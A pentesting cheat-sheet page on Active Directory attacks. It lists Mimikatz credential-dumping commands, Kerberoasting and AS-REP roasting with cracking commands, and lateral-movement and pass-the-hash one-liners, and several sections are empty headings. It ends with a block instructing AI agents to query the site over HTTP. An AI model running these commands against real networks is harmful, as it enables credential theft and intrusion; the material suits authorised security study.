# Active Directory When testing active directory our goals should be to: * gain a foothold on a machine on the domain and elevate our privileges * enumerate the domain to find additional accounts, users, etc. that ideally increase our privilege level on the domain * gain access to the domain controller * persist on the domain (situation dependent) Assuming that we've already [enumerated](/3.-enumeration/active-directory.md) the domain, we should now be focused on gathering credentials to move laterally within the domain. ### Cached credential retrieval Once you have local admin privileges on a domain joined computer you can dump the credentials stored in LSASS and the SAM database. #### Mimikatz ``` mimikatz.exe privilege::debug sekurlsa::logonpasswords (dump lsass) lsadump::sam (dump sam database) sekurlsa::tickets (to dump tickets stored in memory) kerberos::list (view cached kerberos tickets for the current user) ``` ### Attacks #### Kerberoasting If we find interesting service accounts while enumerating we can export the Kerberos 5 etype 23 hash for offline cracking. ``` Extracting SPN hashes crackmapexec ldap $ldapIPaddress -u user -p pass --kerberoasting output.txt kerberos::list /export Crack john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt hashcat -m 13100 hash.txt /path/to/wordlist -o output.txt ``` Alternatively, we can use the **Invoke-Kerberoast.ps1,** to enumerate SPNs, request tickets, and export them in a format ready for cracking. #### AS-REP Roasting The AS-REP roasting attack attempts to retrieve the Kerberos hash of users that don't require Kerberos pre-authentication. ``` Searching for AS-REP Roastable users crackmapexec ldap $ldapIPaddress -u user -p 'pass' --asreproast output.txt GetNPUsers.py domain/user:pass -dc-ip ipaddress -request format john -output.txt Crack john --format:krb5asrep output.txt hashcat -m 18200 hash.txt /path/to/wordlist -o output.txt ``` #### Unconstrained delegation #### Constrained delegataion #### DCSync ### Lateral movement Moving laterally within a domain is fairly straightforward once you have credentials. #### Windows remote management ``` winrs -remote:hostname -u:username -p:password (command) ``` #### PS-Remoting \*\* #### PS-EXEC ``` psexec.py domain/user:password@ipaddress ``` #### SMB-EXEC ``` smbexec.py username:password@ipaddress ``` #### Pass the hash Pass the hash allows attackers to authenticate to a remote system using an NTLM hash. {% hint style="info" %} Many PTH tools require both the LM and NTLM hash as part of the command. If the LM hash is not available you can use a string of 32 zeros in its place. {% endhint %} ``` Passing-the-hash Toolkit pth-winexe -U Administrator%$LMHash:$NTLMHash //$ipaddress cmd Mimikatz privilege::debug sekurlsa::pth /user:Administrator /domain:test.local /ntlm:$hash SMBclient smbclient.py -hashes LMHash:NTLMHash domain/user@$ipaddress PS Exec psexec.py -hashes :NTLMhash administrator@ipaddress ``` #### Overpass the hash The overpass the hash technique utilizes the NTLM hash to obtain a Kerberos ticket, thus avoiding NTLM authentication. #### Pass the ticket ### Persistence #### Golden tickets --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.oncyberwar.com/4.-exploitation/active-directory.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.